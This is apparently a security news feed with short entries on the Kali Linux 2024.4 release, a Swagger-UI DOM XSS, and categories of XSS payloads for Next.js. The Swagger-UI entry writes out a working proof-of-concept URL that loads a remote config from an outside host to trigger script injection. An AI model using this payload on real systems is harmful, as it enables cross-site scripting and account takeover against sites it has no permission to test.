December 18, 2024 at 11:20AM

■■■□□ Kali Linux has released version 2024.4, introducing 14 new tools, deprecating certain features, and implementing various improvements. New Tools: bloodyad: Active Directory privilege escalation framework. certi: Tool for requesting certificates from Active Directory Certificate Services (ADCS) and discovering templates. chainsaw: Utility for rapidly searching and analyzing Windows forensic artifacts. findomain: Fast and comprehensive domain…

December 17, 2024 at 01:21AM

Swagger-UI DOM XSS via DOMPurify library. example.tld/swagger/ index.html?configUrl=https://xss.smarpo.com/test.json https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ https://t.me/cKure/15027

December 15, 2024 at 11:40AM

■■■□□ Lesser-known XSS payloads that work with Next.js Source: Twitter | TheYasinSpace – Dynamic CSS injection XSS – CSS Variable injection XSS – Object Literal injection XSS – CSS Flexbox injection XSS – Unicode Character injection XSS – Dynamic Font injection XSS – CSS Animation injection XSS – Web Font injection XSS – CSS Grid…